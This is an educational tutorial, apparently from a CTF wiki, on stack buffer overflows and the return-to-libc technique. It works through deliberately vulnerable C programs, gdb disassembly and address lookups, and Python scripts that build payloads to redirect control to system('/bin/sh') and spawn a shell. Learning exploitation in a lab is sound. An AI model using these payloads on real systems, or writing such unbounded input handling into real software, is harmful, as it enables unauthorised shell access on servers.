
Return to Libc

Bring on the shell!

Right, so you just redirected the control flow to execute the win function. Previously, win() just printed “Win” to the screen. Now consider the same stack-example.c file, but this time with a different definition of win.

/* stack-example-shell.c */

#include <stdio.h>
#include <stdlib.h>

void win()
{
  system("/bin/sh");
  exit(0);
}

void vuln()
{
  char arr[0x10];
  scanf("%s",arr);   /* no length limit: long input overflows arr */
  printf("Input  : %s",arr);
}

int main()
{
  vuln();
  return 0;
}

Binary file: stack-example-shell

Before we even go into disassembling this, what do you think the system function does? It executes a shell command: system() hands its argument to /bin/sh -c, just as if you had typed it in a terminal. The argument passed here is “/bin/sh”, so the whole statement system(“/bin/sh”) is equivalent to typing /bin/sh in the terminal. Let’s do exactly that and type /bin/sh in the terminal. What did you get? This is a shell, similar to bash, but with fewer features. Try typing commands like pwd, ls and whoami and observe the output. Thus we can see that system(“/bin/sh”) will land us a shell.
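For a quick feel of what system() does, here is a small sketch. It assumes a Linux or other POSIX system and Python 3.9+ (for os.waitstatus_to_exitcode). Python’s os.system() is implemented by calling the C library’s system(), which runs the string through /bin/sh -c, so the two calls below do the same thing. The command "exit 3" is just an arbitrary example.

```python
import os
import subprocess

# os.system() calls the C library's system(), which runs the string as
#   /bin/sh -c "exit 3"
# and waits for it. It returns a wait()-style status, not the exit code itself.
status = os.system("exit 3")
code_via_system = os.waitstatus_to_exitcode(status)

# The same thing spelled out by hand: start /bin/sh and pass it the command with -c.
code_via_sh = subprocess.run(["/bin/sh", "-c", "exit 3"]).returncode

print(code_via_system, code_via_sh)  # 3 3
```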

Now let’s see the disassembly of vuln -

       0x0804846b <+0>: push   ebp
       0x0804846c <+1>: mov    ebp,esp
       0x0804846e <+3>: sub    esp,0x10
       0x08048471 <+6>: lea    eax,[ebp-0x10]
       0x08048474 <+9>: push   eax
       0x08048475 <+10>:    push   0x8048530
       0x0804847a <+15>:    call   0x8048350 <__isoc99_scanf@plt>
       0x0804847f <+20>:    add    esp,0x8
       0x08048482 <+23>:    lea    eax,[ebp-0x10]
       0x08048485 <+26>:    push   eax
       0x08048486 <+27>:    push   0x8048533
       0x0804848b <+32>:    call   0x8048330 <printf@plt>
       0x08048490 <+37>:    add    esp,0x8
       0x08048493 <+40>:    nop
       0x08048494 <+41>:    leave  
       0x08048495 <+42>:    ret

As you can see, arr starts at ebp-0x10 (lea eax,[ebp-0x10]), so this time we only have to give 0x10 bytes of junk data to fill it and then 4 more bytes to overwrite the saved ebp, to reach the saved eip. After that, we overwrite the saved eip with the address of win. Let’s find the address of win first -

(gdb) info functions win
All functions matching regular expression "win":

Non-debugging symbols:
0x080484cb  win
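Before writing the payload, it can be worth confirming the 0x14 offset empirically instead of only reading it off the disassembly. The sketch below uses a simplified stand-in for a de Bruijn pattern (tools such as pwntools’ cyclic generate a more robust version): every 4-byte word of the input is a distinct repeated letter, so the value that lands in eip when the program crashes tells you where in the input it came from. The crash value 0x46464646 is hypothetical; it is what the frame layout above predicts.

```python
import string
import struct

def block_pattern(n_blocks):
    """Return b'AAAABBBBCCCC...', one distinct letter per 4-byte word (max 26 words)."""
    return b"".join(c.encode() * 4 for c in string.ascii_uppercase[:n_blocks])

def offset_of(eip_value, pattern):
    """Offset in the pattern of the 4 bytes that ended up in eip (-1 if absent)."""
    return pattern.find(struct.pack("<I", eip_value))

pattern = block_pattern(8)   # 32 bytes: AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH
# Suppose that, fed this input, the program crashes with eip = 0x46464646 ("FFFF"):
print(hex(offset_of(0x46464646, pattern)))  # 0x14 -> 0x10 bytes of arr + 4 of saved ebp
```

With this input, the saved ebp would be overwritten by "EEEE" (offset 0x10) and the saved eip by "FFFF" (offset 0x14).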

Now let’s write the payload and send it.

(gdb) ! python -c 'print "A"*0x14+"\xcb\x84\x04\x08"' > /tmp/inp
(gdb) b*vuln+42
Breakpoint 1 at 0x804850c
(gdb) r < /tmp/inp
Starting program: /home/vignesh/Documents/stack-example-shell < /tmp/inp

Breakpoint 1, 0x0804850c in vuln ()
(gdb) si
0x080484cb in win ()
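The python -c one-liner above is Python 2 syntax. Under Python 3 the print statement is a syntax error, and even print(...) would write text, so a character like \xcb would be UTF-8 encoded as the two bytes c3 8b and corrupt the address. A minimal Python 3 sketch that writes the same bytes to /tmp/inp, using struct.pack to produce the little-endian form of win’s address:

```python
import struct

WIN = 0x080484cb     # address of win, from "info functions win"
OFFSET = 0x10 + 4    # 0x10 bytes for arr + 4 bytes for the saved ebp

# "<I" = little-endian unsigned 32-bit int, so 0x080484cb becomes cb 84 04 08
payload = b"A" * OFFSET + struct.pack("<I", WIN)

# Write raw bytes (mode "wb"); writing a str in text mode would UTF-8 encode it.
with open("/tmp/inp", "wb") as f:
    f.write(payload)

print(payload)
```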

Outside gdb, we can get a proper shell. ./stack-example-shell < /tmp/inp will spawn the shell all right, but the shell reads from the same stdin as the program, which reaches end-of-file right after the payload, so the shell exits before you can give it any input. To keep the shell open you can do this -

(cat /tmp/inp;cat) | ./stack-example-shell 
ls
stack-example-shell  stack-example-shell.c

The first cat /tmp/inp sends the payload; the second cat then copies whatever you type into the pipe, so the program’s stdin never reaches end-of-file and the shell stays open. We redirect the input with a pipe in this case.
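The same trick can be sketched in Python with subprocess, which is handy once the payload is generated by a script. send_then_interact is a hypothetical helper written for this example, not a library function: it writes the payload first, like cat /tmp/inp, then forwards lines from your terminal, like the second cat. Lines are only forwarded once you press Enter.

```python
import subprocess
import sys

def send_then_interact(argv, payload, user_input=None):
    """Hypothetical helper: feed payload to argv's stdin, then keep forwarding input.

    Mirrors (cat /tmp/inp; cat) | ./program : the pipe stays open after the
    payload, so a shell spawned by the program keeps reading from it.
    """
    if user_input is None:
        user_input = sys.stdin.buffer          # read from the terminal by default
    proc = subprocess.Popen(argv, stdin=subprocess.PIPE)
    try:
        proc.stdin.write(payload)              # like the first `cat /tmp/inp`
        proc.stdin.flush()
        for line in user_input:                # like the second `cat`
            proc.stdin.write(line)
            proc.stdin.flush()
    except BrokenPipeError:
        pass                                   # the program (or its shell) already exited
    finally:
        try:
            proc.stdin.close()                 # end-of-file: the shell sees no more input
        except BrokenPipeError:
            pass
    return proc.wait()

# Usage (assumes the binary and /tmp/inp from above exist):
#   with open("/tmp/inp", "rb") as f:
#       send_then_interact(["./stack-example-shell"], f.read())
```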

So how does getting the binary to spawn a shell improve on a simple printf statement? So far we have run the binary and the exploit locally on our own system. Now imagine that the binary is hosted on a server somewhere and you send the payload as input. What happens? Yes, you get a shell on the server! With that shell, you can do almost anything the user running the program is allowed to do. Thus in most cases, our aim will be to redirect control flow and get a shell.

A bit about libc

Every time you write a C program, you almost certainly use some of the standard functions, like printf, scanf and puts. Have you wondered where the definitions of these functions lie? The standard C functions are compiled into a shared library called the standard C library, or libc. The libc belongs to the system you are working on and is separate from the binary (the compiled program). You can use the ldd command to find out which libc an application uses.

$ ldd ./ret2libc
    linux-gate.so.1 =>  (0xf76df000)
    libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf74fd000)
    /lib/ld-linux.so.2 (0xf76e0000)

Thus /lib/i386-linux-gnu/libc.so.6 is the libc used by the binary. The libc is ‘linked’ to the binary at execution time by the dynamic loader. So if you just load a binary into gdb and try disas puts, you will not get the actual disassembly of the puts function, because the program is not running yet and libc has not been loaded. Once the program is running, however, you can see the full disassembly of puts or any other libc function for that matter.

(gdb) disas puts    -No libc loaded thus puts will not exist right now
No symbol table is loaded.  Use the "file" command.
(gdb) start     -Start executing the binary. Libc gets loaded now
Temporary breakpoint 1 at 0x8048499
Starting program: /home/vignesh/Documents/a.out

Temporary breakpoint 1, 0x08048499 in main ()
(gdb) disas puts    -Now libc is loaded and thus puts exists
Dump of assembler code for function _IO_puts:
   0xf7e55ca0 <+0>: push   ebp
   0xf7e55ca1 <+1>: mov    ebp,esp
   0xf7e55ca3 <+3>: push   edi
   0xf7e55ca4 <+4>: push   esi
   0xf7e55ca5 <+5>: push   ebx
   ....
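The same ‘loaded at run time’ behaviour can be seen from inside any dynamically linked process, not just under gdb. This sketch assumes Linux (it reads /proc/self/maps, the same information gdb’s info proc map shows) and a Python that is itself dynamically linked against the system libc. It asks the dynamic loader for the address of puts and then finds the memory mapping that contains it. The printed address will differ between machines and usually between runs; mapping_for is a helper written for this example.

```python
import ctypes
import ctypes.util

def mapping_for(addr, maps_path="/proc/self/maps"):
    """Return (start, end, path) of the memory mapping that contains addr, or None."""
    with open(maps_path) as f:
        for line in f:
            fields = line.split()
            start, end = (int(x, 16) for x in fields[0].split("-"))
            if start <= addr < end:
                path = fields[5] if len(fields) > 5 else ""
                return start, end, path
    return None

# dlopen() the C library; since Python already uses it, this returns the copy
# that is already mapped into this process rather than loading a second one.
libc = ctypes.CDLL(ctypes.util.find_library("c") or None)

# Runtime address of puts inside that mapped libc.
puts_addr = ctypes.cast(libc.puts, ctypes.c_void_p).value
start, end, path = mapping_for(puts_addr)
print(hex(puts_addr), path, "offset within that mapping:", hex(puts_addr - start))
```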

Understanding the libc is important from an exploitation point of view, because we can redirect the control flow to libc functions, as we will see in the following section. Since a libc file belongs to a particular system, each of us may have a different one. So that the libc addresses used in this wiki match the ones you see when you try out the challenges yourself, we will provide the libc file along with the binary. To run programs with a libc file other than your host libc, you can use the LD_PRELOAD environment variable. For example, if you want to use a libc called libc.so instead of your original one, you can set LD_PRELOAD to the path of that libc file -

$ ls
a.out  libc.so
$ export LD_PRELOAD=./libc.so

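Note that export makes LD_PRELOAD apply to every program you start from that shell afterwards; to use the libc for a single run only, prefix the command instead: LD_PRELOAD=./libc.so ./a.out. Within gdb, you can set LD_PRELOAD like this -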

(gdb) set environment LD_PRELOAD=./libc.so
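If you drive the binary from a script rather than an interactive shell, you can set LD_PRELOAD for one child process only. A minimal sketch, assuming the binary and libc.so.6 from this section sit in the current directory; run_with_libc is a hypothetical helper name. Keep in mind that preloading a libc built for a different glibc version than your system’s dynamic loader (ld.so) can make the program fail at startup, in which case a matching loader is needed as well.

```python
import os
import subprocess

def run_with_libc(argv, libc_path, stdin_data=b""):
    """Hypothetical helper: run argv with libc_path preloaded, for this child only.

    Shell equivalent: LD_PRELOAD=./libc.so.6 ./ret2libc
    """
    env = dict(os.environ, LD_PRELOAD=libc_path)   # the parent's environment is untouched
    return subprocess.run(argv, input=stdin_data, env=env, capture_output=True)

# Usage (assumes ./ret2libc and ./libc.so.6 exist):
#   result = run_with_libc(["./ret2libc"], "./libc.so.6", b"hello\n")
#   print(result.stdout)
```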

Return-to-libc

So now you know what a buffer overflow vulnerability is and also how to use it to control the flow of the application and execute code at an address of our choice. In the previous section, we directed the control flow to execute a function called win, and with the help of this function we spawned a shell. But you might be wondering: surely no real-world program would contain such a helpful function as our ‘win’? Well, you are right there. But what almost every application does have access to is the standard C shared library, or ‘libc’.

The libc contains all the standard functions that can be used by any C program. The ‘win’ function we used previously actually called the C function ‘system’, which executes a shell command. Since system is a standard C function, it will surely exist in the libc. If you check out the man page of ‘system’, you will notice that its argument is a pointer to the command string to be executed. The string “/bin/sh” is also present in the libc (system itself uses it to run commands), so getting the pointer is just a matter of noting the address of this string.

So before proceeding further, let’s get our aim clear. We want to exploit a simple buffer overflow bug, the same as in the previous section, but this time there will be no ‘win’-type functions to make life easy for us. For our example, the aim will be to get our vulnerable application to spawn a shell. Thus we need to overwrite the return address with the address of the ‘system’ function and provide, as its argument, a pointer to “/bin/sh”.

OK, three paragraphs of theory are more than enough! Let’s get our hands dirty now. We’ll use the same code as in the previous section, but without the win function.

/* ret2libc.c */

#include <stdio.h>

void vuln()
{
  char arr[0x10];
  scanf("%s",arr);   /* no length limit: long input overflows arr */
  printf("Input  : %s",arr);
}

int main()
{
  vuln();
  return 0;
}

Binary file: ret2libc

libc: libc.so.6

First let’s take a look at the disassembly of main -

   0x08048496 <+0>: push   ebp
   0x08048497 <+1>: mov    ebp,esp
   0x08048499 <+3>: call   0x804846b <vuln>
   0x0804849e <+8>: mov    eax,0x0
   0x080484a3 <+13>:    pop    ebp
   0x080484a4 <+14>:    ret

Now here’s the disassembly of vuln -

   0x0804846b <+0>: push   ebp
   0x0804846c <+1>: mov    ebp,esp
   0x0804846e <+3>: sub    esp,0x10
   0x08048471 <+6>: lea    eax,[ebp-0x10]
   0x08048474 <+9>: push   eax
   0x08048475 <+10>:    push   0x8048530
   0x0804847a <+15>:    call   0x8048350 <__isoc99_scanf@plt>
   0x0804847f <+20>:    add    esp,0x8
   0x08048482 <+23>:    lea    eax,[ebp-0x10]
   0x08048485 <+26>:    push   eax
   0x08048486 <+27>:    push   0x8048533
   0x0804848b <+32>:    call   0x8048330 <printf@plt>
   0x08048490 <+37>:    add    esp,0x8
   0x08048493 <+40>:    nop
   0x08048494 <+41>:    leave  
   0x08048495 <+42>:    ret

As you can see, the layout is the same as before: 0x10 bytes of junk data and then 4 more bytes for the saved ebp take us to the saved eip. Earlier we overwrote the saved eip with the address of the win function, but now we will overwrite it directly with the address of system. Here is how you find the address of system -

   (gdb) start
   Temporary breakpoint 1 at 0x8048499 
   Starting program: /home/vignesh/Documents/ret2libc

   Temporary breakpoint 1, 0x08048499 in main ()
   (gdb) print system 
   $1 = {<text variable, no debug info>} 0xf7e5a940 <system>

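Thus the address of system is 0xf7e5a940. Since x86 is little-endian, the address goes into the payload with its bytes reversed, as \x40\xa9\xe5\xf7. Let’s craft our input and then run the program with that input -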

   (gdb) b*vuln+42
   Breakpoint 1 at 0x8048495
   (gdb) ! python -c 'print "A" * 0x14 + "\x40\xa9\xe5\xf7"'  > /tmp/inp
   (gdb) r < /tmp/inp    
   Starting program: /home/vignesh/Documents/ret2libc < /tmp/inp
   Breakpoint 1, 0x08048495 in vuln ()
   (gdb) x/i $eip
   => 0x8048495 <vuln+42>:  ret
   (gdb) si
   0xf7e5a940 in system () from ./libc.so.6

Right, so we entered system. But what about the argument? Well, let’s fix that now. Do you remember how arguments are passed to functions in 32-bit x86? They are pushed onto the stack, in reverse order, before the function is called, and the call instruction then pushes the return address. Once the function has run its prologue (push ebp; mov ebp,esp), its arguments are found at ebp+0x8, ebp+0xc, ebp+0x10 and so on, with ebp+0x4 holding the return address of the function.
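To make this stack bookkeeping concrete, here is a small Python simulation of the last two instructions of vuln (leave; ret) followed by the usual push ebp; mov ebp,esp prologue, which we assume system begins with. It uses the system address found above and the “/bin/sh” pointer 0xf7f78e8b that we locate in libc below; BUF, the address of arr, is a made-up stack address, since only offsets from it matter.

```python
import struct

BUF = 0xffffd000      # made-up address of arr[]; only offsets from it matter
SYSTEM = 0xf7e5a940   # address of system (from "print system")
BINSH = 0xf7f78e8b    # pointer to "/bin/sh" inside libc

# Stack memory from arr[] upwards, after scanf has copied our input into it.
stack = bytearray(b"A" * 0x10                   # arr[]
                  + b"A" * 4                    # saved ebp
                  + struct.pack("<I", SYSTEM)   # saved eip -> system
                  + b"AAAA"                     # what system will treat as its return address
                  + struct.pack("<I", BINSH))   # what system will treat as its first argument

def read(addr):
    return struct.unpack_from("<I", stack, addr - BUF)[0]

def write(addr, value):
    struct.pack_into("<I", stack, addr - BUF, value)

ebp = BUF + 0x10             # inside vuln, arr[] is at ebp-0x10

# leave  ==  mov esp, ebp ; pop ebp
esp = ebp
ebp = read(esp); esp += 4    # ebp now holds our junk 0x41414141

# ret  ==  pop eip   (unlike call, nothing is pushed)
eip = read(esp); esp += 4

# Assumed prologue of system: push ebp ; mov ebp, esp
esp -= 4; write(esp, ebp)
ebp = esp

print(hex(eip))              # 0xf7e5a940: execution is now in system
print(hex(ebp - BUF))        # 0x14: system's ebp is the old saved-eip slot
print(hex(read(ebp + 4)))    # 0x41414141: system's "return address"
print(hex(read(ebp + 8)))    # 0xf7f78e8b: system's first argument
```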

So in our case, the ret instruction at the end of the vuln function pops our overwritten saved eip and jumps to system. Unlike call, ret does not push a return address, so when system’s prologue pushes ebp, it lands in the very slot that held the saved eip, and that slot becomes system’s ebp. Thus the 4 bytes directly above it (ebp+0x4) are what system treats as its return address, and the 4 bytes after that (ebp+0x8) are its argument. For us there is only one argument, the pointer to the string /bin/sh. Let’s find out the address of this string in the libc -

(gdb) r < /tmp/inp
Breakpoint 1, 0x08048495 in vuln ()
(gdb) info proc map
process 16302
Mapped address spaces:

Start Addr   End Addr       Size     Offset objfile
 0x8048000  0x8049000     0x1000        0x0 /home/vignesh/Documents/ret2libc
 0x8049000  0x804a000     0x1000        0x0 /home/vignesh/Documents/ret2libc
 0x804a000  0x804b000     0x1000     0x1000 /home/vignesh/Documents/ret2libc
 0x804b000  0x806d000    0x22000        0x0 [heap]
0xf7e1f000 0xf7e20000     0x1000        0x0 
0xf7e20000 0xf7fcd000   0x1ad000        0x0 /home/vignesh/Documents/libc.so.6
0xf7fcd000 0xf7fce000     0x1000   0x1ad000 /home/vignesh/Documents/libc.so.6
0xf7fce000 0xf7fd0000     0x2000   0x1ad000 /home/vignesh/Documents/libc.so.6
0xf7fd0000 0xf7fd1000     0x1000   0x1af000 /home/vignesh/Documents/libc.so.6
0xf7fd1000 0xf7fd5000     0x4000        0x0 
0xf7fd5000 0xf7fd8000     0x3000        0x0 [vvar]
0xf7fd8000 0xf7fd9000     0x1000        0x0 [vdso]
0xf7fd9000 0xf7ffc000    0x23000        0x0 /lib/i386-linux-gnu/ld-2.23.so
0xf7ffc000 0xf7ffd000     0x1000    0x22000 /lib/i386-linux-gnu/ld-2.23.so
0xf7ffd000 0xf7ffe000     0x1000    0x23000 /lib/i386-linux-gnu/ld-2.23.so
0xfffdd000 0xffffe000    0x21000        0x0 [stack]
(gdb) find 0xf7e20000, 0xf7fd1000 , "/bin/sh"
0xf7f78e8b
1 pattern found.
(gdb) x/s 0xf7f78e8b
0xf7f78e8b: "/bin/sh"

We first find the start and end addresses of libc with info proc map and then pass them to the find command. If you are not sure how find works, help find inside gdb describes its syntax.
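Since libc is mapped as one block, what really pins down system and “/bin/sh” is their offset from the libc base (the first libc.so.6 line in info proc map, 0xf7e20000). The sketch below computes those offsets from the numbers above and, as an offline alternative to gdb’s find, searches the libc file itself for the NUL-terminated string (the NUL ensures we match a complete C string, not a prefix of a longer one). Treating the file offset as the in-memory offset assumes the string sits in a segment whose file offset equals its offset from the load base; that is typical for libc, but worth double-checking against the gdb result. find_in_file is a hypothetical helper name.

```python
LIBC_BASE = 0xf7e20000   # first libc.so.6 mapping in "info proc map"
SYSTEM = 0xf7e5a940      # from "print system"
BINSH = 0xf7f78e8b       # from find ... "/bin/sh"

system_off = SYSTEM - LIBC_BASE
binsh_off = BINSH - LIBC_BASE
print(hex(system_off), hex(binsh_off))   # 0x3a940 0x158e8b

def find_in_file(path, needle=b"/bin/sh\x00"):
    """Hypothetical helper: file offset of the first occurrence of needle, or -1."""
    with open(path, "rb") as f:
        return f.read().find(needle)

# Usage (assumes the provided libc.so.6 is in the current directory):
#   off = find_in_file("./libc.so.6")
#   print(hex(off), hex(LIBC_BASE + off))   # compare with the address gdb found
```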

Thus 0xf7f78e8b is a pointer to the string /bin/sh. Now let’s put together the whole exploit. Writing the exploit as a Python script in a separate file is a bit more convenient than writing it inline in gdb.

''' exploit.py (Python 3) '''

inp = b"A"*0x10              # The initial junk bytes to fill up the buffer
inp += b"A"*4                # To overwrite the saved ebp
inp += b"\x40\xa9\xe5\xf7"   # Overwrite the saved eip with the address of system (little-endian)
inp += b"AAAA"               # Return address of system. system only returns once the shell exits, so junk here just means a crash at that point.
inp += b"\x8b\x8e\xf7\xf7"   # The argument to system. This is the pointer to the string "/bin/sh"

with open("/tmp/inp", "wb") as f:   # Open /tmp/inp in binary mode and write the raw bytes
    f.write(inp)
''' run "python3 exploit.py" in the terminal to run this file '''

Then feed the generated file to the program in gdb, with the breakpoint at vuln+42 still set:

    (gdb) r < /tmp/inp
    Breakpoint 1, 0x08048495 in vuln ()
    (gdb) c
    process 17735 is executing new program: /bin/dash

Thus the program executed system with the argument “/bin/sh”, resulting in a shell.

Therefore we were able to execute a shell without any helper functions. Instead of system we can redirect the control flow to any standard C function. This technique is known as return-to-libc or ret2libc.
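The layout generalises: padding up to the saved eip, then the libc function, then the address it should return to, then its arguments. A minimal sketch of that recipe for the 32-bit case in this section; p32 and ret2libc_payload are local helpers written for this example (pwntools has a p32 with the same meaning). It also rejects payloads containing whitespace bytes, because scanf("%s") stops reading at the first space, tab, newline and so on, which would silently truncate the input.

```python
import struct

# Bytes that isspace() accepts in the C locale; scanf("%s") stops at any of them.
SCANF_BAD_BYTES = b" \t\n\v\f\r"

def p32(value):
    """Pack a 32-bit value in little-endian order, as x86 stores it."""
    return struct.pack("<I", value)

def ret2libc_payload(func, ret_addr, *args, offset=0x14):
    """Padding up to the saved eip, then func, its return address and its arguments."""
    payload = b"A" * offset + p32(func) + p32(ret_addr) + b"".join(p32(a) for a in args)
    bad = sorted(set(payload) & set(SCANF_BAD_BYTES))
    if bad:
        raise ValueError(f"payload contains bytes scanf would stop at: {bad}")
    return payload

# The payload from exploit.py: system("/bin/sh") with junk as system's return address.
payload = ret2libc_payload(0xf7e5a940, 0x41414141, 0xf7f78e8b)
print(payload)
```

A common variation is to pass the address of libc’s exit (looked up with print exit, just like system) as ret_addr instead of 0x41414141: when the shell exits, system then returns into exit and the program terminates without a crash, with whatever exit status happens to be on the stack.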

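Unfortunately, this exploit will not work outside gdb, due to a mitigation technique called Address Space Layout Randomization (ASLR): with ASLR enabled, libc is loaded at a different address on every run, so the hard-coded addresses of system and “/bin/sh” go stale. It worked inside gdb because gdb disables address randomization for the programs it starts by default (see set disable-randomization). We will discuss this mitigation and how to bypass it in later sections.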
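On Linux you can check whether ASLR is active on your machine by reading /proc/sys/kernel/randomize_va_space. A small Linux-only sketch; the descriptions of 0, 1 and 2 follow the kernel’s documented meanings of this setting.

```python
ASLR_MODES = {
    0: "off: everything, including libc, loads at the same address every run",
    1: "partial: stack, mmap'd regions (such as shared libraries like libc) and vDSO are randomized",
    2: "full: as 1, plus the heap (brk) is randomized",
}

def aslr_mode(path="/proc/sys/kernel/randomize_va_space"):
    """Read the kernel's current ASLR setting as an int."""
    with open(path) as f:
        return int(f.read().strip())

mode = aslr_mode()
print(mode, ASLR_MODES.get(mode, "unknown"))
```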